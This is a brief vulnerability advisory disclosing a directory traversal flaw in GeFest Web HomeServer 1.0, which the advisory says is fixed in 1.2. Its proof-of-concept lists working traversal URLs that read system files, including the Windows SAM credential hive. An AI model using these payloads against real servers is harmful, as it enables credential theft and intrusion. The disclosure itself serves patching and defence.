Product : GeFest Web HomeServer
Version : 1.0
URL : http://clearweb.org.ua/
Platform : Windows
Type of vulnerability : Directory Traversal
Risk rating : High
Issue fixed in version : 1.2
Vulnerability discovered by : MarkoT
0x01 : Vendor description of software
From the vendor website:
"""Gefest Web Home Server is a Simple Web Server with Graphical User interface.
Server allow watch video directly from another pc.
Server allow create software storage.
Server support password protection.
Server allow review all user activity (Server log and Activity log)
Share your folders in internet or local network.
Add / Remove folders with use simple interface."""
0x02 : Vulnerability details
By default, the utility runs as an application (and it's very likely that people will run this with administrator privileges)
The discovered vulnerability allows an attacker to access files outside of the web application root.
PoC :
http://192.168.1.200:8080/\\../\\../\\../WINDOWS\\SYSTEM32\\calc.exe
http://192.168.1.200:8080/\\../\\../\\../WINDOWS\\SYSTEM32\\config\\sam
http://192.168.1.200:8080/\\../\\../\\../WINDOWS\\SYSTEM32
http://192.168.1.200:8080/\\../\\../\\../boot.ini
Home
Print this Post 
